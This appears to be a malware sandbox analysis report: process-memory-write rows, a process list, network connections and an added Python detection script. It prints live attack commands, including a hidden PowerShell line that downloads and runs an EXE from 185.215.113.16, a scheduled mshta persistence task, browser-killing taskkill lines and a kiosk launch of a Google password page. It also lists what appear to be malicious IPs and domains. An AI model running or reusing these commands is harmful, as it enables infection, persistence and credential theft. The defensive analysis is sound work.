PID 4900 wrote to memory of 1304 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 716 wrote to memory of 3420 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 716 wrote to memory of 3420 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 716 wrote to memory of 3420 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3420 wrote to memory of 928 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE
PID 3420 wrote to memory of 928 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE
PID 3420 wrote to memory of 928 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE
PID 928 wrote to memory of 984 N/A C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 928 wrote to memory of 984 N/A C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 928 wrote to memory of 984 N/A C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 984 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe
PID 984 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe
PID 984 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe
PID 984 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe
PID 984 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe
PID 984 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe
PID 2900 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe
PID 2900 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe
PID 2900 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe
PID 2900 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe
PID 2900 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe
PID 2900 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe
PID 2900 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe
PID 2900 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe
PID 2900 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe
PID 4480 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 4480 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 4480 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 4480 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 4480 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 4480 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 4480 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 4480 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 4480 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 4480 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 984 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe
PID 984 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe
PID 984 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe
PID 984 wrote to memory of 3584 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10110540101\a84d3ad71d.exe
PID 984 wrote to memory of 3584 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10110540101\a84d3ad71d.exe
PID 984 wrote to memory of 3584 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10110540101\a84d3ad71d.exe
PID 2936 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 2936 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 2936 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 2936 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 2936 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 2936 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 2936 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 2936 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 2936 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 2936 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 984 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10110560101\563315ef27.exe
PID 984 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10110560101\563315ef27.exe
PID 984 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10110560101\563315ef27.exe
PID 984 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe
PID 984 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe

"C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn Folnhmalct0 /tr "mshta C:\Users\Admin\AppData\Local\Temp\jfXTS3uY9.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\jfXTS3uY9.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn Folnhmalct0 /tr "mshta C:\Users\Admin\AppData\Local\Temp\jfXTS3uY9.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE

"C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe

"C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe"

C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe

"C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe"

C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe

"C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2900 -ip 2900

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2900 -s 800

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe

"C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe"

C:\Users\Admin\AppData\Local\Temp\10110540101\a84d3ad71d.exe

"C:\Users\Admin\AppData\Local\Temp\10110540101\a84d3ad71d.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10110560101\563315ef27.exe

"C:\Users\Admin\AppData\Local\Temp\10110560101\563315ef27.exe"

C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe

"C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe /T

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1996 -parentBuildID 20240401114208 -prefsHandle 1924 -prefMapHandle 1916 -prefsLen 27352 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f471028b-8d0e-4c0d-844c-b7c707138204} 4776 "\\.\pipe\gecko-crash-server-pipe.4776" gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2432 -parentBuildID 20240401114208 -prefsHandle 2424 -prefMapHandle 2412 -prefsLen 28272 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e60a7b15-7d1f-4dc5-98bf-11a5d4d8f05b} 4776 "\\.\pipe\gecko-crash-server-pipe.4776" socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3116 -childID 1 -isForBrowser -prefsHandle 3288 -prefMapHandle 3232 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c65ca5cb-f2ce-4287-9238-a64074ae4de6} 4776 "\\.\pipe\gecko-crash-server-pipe.4776" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4080 -childID 2 -isForBrowser -prefsHandle 4056 -prefMapHandle 4052 -prefsLen 32762 -prefMapSize 244628 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5e02e047-153a-4efd-90cd-b8b013d6e537} 4776 "\\.\pipe\gecko-crash-server-pipe.4776" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4952 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4928 -prefMapHandle 4912 -prefsLen 32762 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9a84c741-04d9-457f-8ef3-68323687c6a2} 4776 "\\.\pipe\gecko-crash-server-pipe.4776" utility

C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe

"C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4928 -childID 3 -isForBrowser -prefsHandle 5244 -prefMapHandle 5248 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {44683e53-4e36-41cc-9d3a-d55400203641} 4776 "\\.\pipe\gecko-crash-server-pipe.4776" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5352 -childID 4 -isForBrowser -prefsHandle 5396 -prefMapHandle 5404 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {afcb5a54-ddfa-4fca-b3ae-fda6b1b10b1c} 4776 "\\.\pipe\gecko-crash-server-pipe.4776" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5584 -childID 5 -isForBrowser -prefsHandle 5540 -prefMapHandle 5380 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5f4c1057-c3e5-47cd-bad4-f599bf770f88} 4776 "\\.\pipe\gecko-crash-server-pipe.4776" tab

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
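
The "Suspicious use of WriteProcessMemory" rows above and this Processes list are the two places where the chain becomes legible: the write rows give parent/child PIDs and how many times each parent wrote into each child, and the command lines give the launch mechanics. The Python below is an added example written for this report; it is not code from the sandbox, the report's author or the malware. The row texts and command lines are copied from the report. The three-write baseline for an ordinary CreateProcess, the rule regexes and the %TEMP% value `C:\Users\Admin\AppData\Local\Temp` are this example's assumptions.

```python
"""Rebuild the process tree from the report's "PID X wrote to memory of Y" rows
and flag the command lines that make this chain malicious. Added example for
this report, not code from the sandbox or the malware: rows and command lines
are copied from the report; threshold, regexes and the %TEMP% value are assumed."""
import re
from collections import Counter, defaultdict

T = r"C:\Users\Admin\AppData\Local\Temp"          # assumed %TEMP% of the sandbox user
SAMPLE = T + r"\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe"
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
LOADER = r"C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE"
RAPES = T + r"\bb556cff4a\rapes.exe"
BTG = r"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
D1, D2, D3 = (T + r"\10110510101\d8c76c7b0b.exe", T + r"\10110520101\78de00ab05.exe",
              T + r"\10110530101\3aae3cdde2.exe")

def rows(p, c, src, dst, n):
    """n identical rows: the sandbox logs one row per WriteProcessMemory call."""
    return [f"PID {p} wrote to memory of {c} N/A {src} {dst}"] * n

# Constructed input: the WriteProcessMemory rows of the report with their counts.
WPM_ROWS = (rows(4808, 4900, SAMPLE, r"C:\Windows\SysWOW64\cmd.exe", 3)
            + rows(4808, 716, SAMPLE, r"C:\Windows\SysWOW64\mshta.exe", 3)
            + rows(4900, 1304, r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\schtasks.exe", 3)
            + rows(716, 3420, r"C:\Windows\SysWOW64\mshta.exe", PS, 3)
            + rows(3420, 928, PS, LOADER, 3) + rows(928, 984, LOADER, RAPES, 3)
            + rows(984, 4480, RAPES, D1, 3) + rows(984, 2900, RAPES, D2, 3)
            + rows(2900, 2016, D2, D2, 9)          # relaunches itself, 9 writes
            + rows(4480, 2556, D1, BTG, 10)        # signed Windows binary, 10 writes
            + rows(984, 2936, RAPES, D3, 3) + rows(2936, 1432, D3, BTG, 10))

ROW_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (.+?) (C:\\.+)$")

def build_tree(lines):
    """parent -> {children}, pid -> image path, (parent, child) -> write count."""
    children, image, writes = defaultdict(set), {}, Counter()
    for line in lines:
        m = ROW_RE.match(line)
        if not m:
            continue
        p, c = int(m[1]), int(m[2])
        children[p].add(c)
        image.setdefault(p, m[3])
        image.setdefault(c, m[4])
        writes[(p, c)] += 1
    return children, image, writes

def render(children, image, pid, depth=0):
    """Indented listing of the tree below pid, one line per process."""
    out = ["  " * depth + f"{pid} {image[pid]}"]
    for c in sorted(children.get(pid, ())):
        out += render(children, image, c, depth + 1)
    return out

def hollowing_candidates(image, writes, threshold=3):
    """Assumption: three writes is the CreateProcess baseline in this report; a parent
    in the user profile writing more into a self-copy or a Windows binary stages code."""
    hits = []
    for (p, c), n in writes.items():
        src, dst = image[p].lower(), image[c].lower()
        staged = dst == src or dst.startswith(r"c:\windows")
        if n > threshold and staged and src.startswith(r"c:\users"):
            hits.append((p, c, image[c]))
    return hits

# Constructed input: command lines from the Processes section (one benign control).
CMDLINES = [
    r'C:\Windows\system32\cmd.exe /c schtasks /create /tn Folnhmalct0 /tr "mshta '
    + T + r'\jfXTS3uY9.hta" /sc minute /mo 25 /ru "Admin" /f',
    '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -WindowStyle Hidden '
    "$d=$env:temp+'GSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE';(New-Object System.Net.WebClient)"
    ".DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;",
    "taskkill /F /IM chrome.exe /T",
    '"C:\\Program Files\\Mozilla Firefox\\firefox.exe" --kiosk "https://youtube.com/account?='
    'https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check',
    '"C:\\Program Files\\Mozilla Firefox\\firefox.exe" -contentproc --channel=1996 gpu',
]
RULES = {  # regexes are this example's, tuned to the command lines above
    "schtasks_mshta_hta": re.compile(r'schtasks\s+/create\b.*?/tr\s+"?mshta\b.*?\.hta', re.I),
    "ps_hidden_download_exec": re.compile(r"-WindowStyle\s+Hidden\b.*?\.DownloadFile\(.*?Start-Process", re.I),
    "taskkill_browser": re.compile(r"taskkill\s+/F\s+/IM\s+(chrome|firefox|msedge|opera|brave)\.exe", re.I),
    "kiosk_google_login": re.compile(r'--kiosk\s+"?https?://\S*accounts\.google\.com', re.I),
}

def match_rules(cmdline):
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))

PS_DL_RE = re.compile(r"\$d=\$env:temp\+'([^']+)'.*?DownloadFile\('([^']+)',\$d\)")

def ps_download(cmdline, temp=T):
    """(url, on-disk path). $env:temp+'NAME' has no backslash, so the file lands
    beside the Temp folder as ...Local\\TempNAME, the odd path the report lists."""
    m = PS_DL_RE.search(cmdline)
    return (m[2], temp + m[1]) if m else None
```

Three things fall out of running this over the report's own rows. First, rapes.exe (PID 984) is the hub that launches every numbered payload under `Temp\101105x0101\`. Second, the write counts separate plain process creation (three writes for every cmd/mshta/powershell hop) from code staging: 78de00ab05.exe relaunching itself with nine writes, and the two droppers writing ten times each into the signed BitLockerToGo.exe, so memory acquisition should target PIDs 2016, 2556 and 1432 rather than the parent binaries on disk. Third, the strange `...\Local\TempGSNZ...EXE` path is not an extraction error: the PowerShell one-liner concatenates `$env:temp` and the file name without a separator, so a hunt for this loader should look next to the Temp folder, not inside it. Note also that the task `Folnhmalct0` re-runs the .hta every 25 minutes, so deleting the dropped EXE without removing the task only buys 25 minutes.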

Network

Country Destination Domain Proto
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
RU 176.113.115.6:80 176.113.115.6 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 exarthynature.run udp
US 104.21.16.1:443 exarthynature.run tcp
US 104.21.16.1:443 exarthynature.run tcp
US 104.21.16.1:443 exarthynature.run tcp
US 104.21.16.1:443 exarthynature.run tcp
US 104.21.16.1:443 exarthynature.run tcp
US 104.21.16.1:443 exarthynature.run tcp
NL 185.156.73.73:80 185.156.73.73 tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 dawtastream.bet udp
US 8.8.8.8:53 foresctwhispers.top udp
US 8.8.8.8:53 tracnquilforest.life udp
US 8.8.8.8:53 collapimga.fun udp
US 8.8.8.8:53 seizedsentec.online udp
US 8.8.8.8:53 strawpeasaen.fun udp
US 8.8.8.8:53 quietswtreams.life udp
US 8.8.8.8:53 starrynsightsky.icu udp
US 8.8.8.8:53 earthsymphzony.today udp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
US 8.8.8.8:53 farmingtzricks.top udp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
NL 185.156.73.73:80 185.156.73.73 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
RU 45.93.20.28:80 45.93.20.28 tcp
US 8.8.8.8:53 youtube.com udp
GB 142.250.187.206:443 youtube.com tcp
US 8.8.8.8:53 youtube.com udp
GB 142.250.187.206:443 youtube.com tcp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 firefox-api-proxy.cdn.mozilla.net udp
US 34.117.188.166:443 spocs.getpocket.com udp
US 34.149.97.1:443 firefox-api-proxy.cdn.mozilla.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
GB 142.250.187.206:443 youtube.com udp
US 8.8.8.8:53 www.youtube.com udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
GB 142.250.200.46:443 www.youtube.com tcp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
N/A 127.0.0.1:60556 tcp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
GB 142.250.200.46:443 youtube-ui.l.google.com udp
US 8.8.8.8:53 consent.youtube.com udp
GB 216.58.213.14:443 consent.youtube.com tcp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 consent.youtube.com udp
GB 216.58.213.14:443 consent.youtube.com udp
US 8.8.8.8:53 tracking-protection.cdn.mozilla.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 8.8.8.8:53 tracking-protection.prod.mozaws.net udp
US 8.8.8.8:53 tracking-protection.prod.mozaws.net udp
US 8.8.8.8:53 tracking-protection.cdn.mozilla.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 8.8.8.8:53 www.google.com udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
GB 216.58.204.68:443 www.google.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 216.58.204.68:443 www.google.com udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
